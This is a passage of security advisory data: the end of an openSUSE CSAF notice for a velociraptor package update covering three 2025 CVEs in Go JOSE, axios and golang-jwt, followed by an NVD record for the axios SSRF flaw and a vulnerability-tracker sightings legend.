"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15307-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27144 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27144/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-30204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-30204/"
}
],
"title": "velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media",
"tracking": {
"current_release_date": "2025-07-03T00:00:00Z",
"generator": {
"date": "2025-07-03T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15307-1",
"initial_release_date": "2025-07-03T00:00:00Z",
"revision_history": [
{
"date": "2025-07-03T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"product": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"product_id": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
},
"product_reference": "velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27144",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27144"
}
],
"notes": [
{
"category": "general",
"text": "Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. In versions on the 4.x branch prior to version 4.0.5, when parsing compact JWS or JWE input, Go JOSE could use excessive memory. The code used strings.Split(token, \".\") to split JWT tokens, which is vulnerable to excessive memory consumption when processing maliciously crafted tokens with a large number of `.` characters. An attacker could exploit this by sending numerous malformed tokens, leading to memory exhaustion and a Denial of Service. Version 4.0.5 fixes this issue. As a workaround, applications could pre-validate that payloads passed to Go JOSE do not contain an excessive number of `.` characters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27144",
"url": "https://www.suse.com/security/cve/CVE-2025-27144"
},
{
"category": "external",
"summary": "SUSE Bug 1237608 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237608"
},
{
"category": "external",
"summary": "SUSE Bug 1237609 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27144"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-30204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-30204"
}
],
"notes": [
{
"category": "general",
"text": "golang-jwt is a Go implementation of JSON Web Tokens. Starting in version 3.2.0 and prior to versions 5.2.2 and 4.5.2, the function parse.ParseUnverified splits (via a call to strings.Split) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request whose Authorization header consists of Bearer followed by many period characters, a call to that function incurs allocations to the tune of O(n) bytes (where n stands for the length of the function\u0027s argument), with a constant factor of about 16. This issue is fixed in 5.2.2 and 4.5.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-30204",
"url": "https://www.suse.com/security/cve/CVE-2025-30204"
},
{
"category": "external",
"summary": "SUSE Bug 1240441 for CVE-2025-30204",
"url": "https://bugzilla.suse.com/1240441"
},
{
"category": "external",
"summary": "SUSE Bug 1240442 for CVE-2025-30204",
"url": "https://bugzilla.suse.com/1240442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.aarch64",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.ppc64le",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.s390x",
"openSUSE Tumbleweed:velociraptor-0.7.0.4.git163.87ee3570-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-07-03T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-30204"
}
]
}
fkie_cve-2025-27152
Vulnerability from fkie_nvd
Published
2025-03-07 16:15
Modified
2025-09-22 18:52
Severity ?
Summary
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "22E658DD-EA2E-454A-BEB1-3B9BC30D017E",
"versionEndExcluding": "0.30.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "2EFCE157-4712-4CC5-8DB4-9ACCC8C1016E",
"versionEndIncluding": "1.7.9",
"versionStartIncluding": "1.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2."
},
{
"lang": "es",
"value": "axios es un cliente HTTP basado en promesas para el navegador y node.js. El problema ocurre cuando se pasan URL absolutas en lugar de URL relativas al protocolo a axios. Incluso si se configura ?baseURL, axios env\u00eda la solicitud a la URL absoluta especificada, lo que puede provocar una fuga de credenciales y SSRF. Este problema afecta tanto al uso del lado del servidor como del lado del cliente de axios. Este problema se solucion\u00f3 en 1.8.2."
}
],
"id": "CVE-2025-27152",
"lastModified": "2025-09-22T18:52:22.807",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-03-07T16:15:38.773",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Broken Link"
],
"url": "https://github.com/axios/axios/issues/6463"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…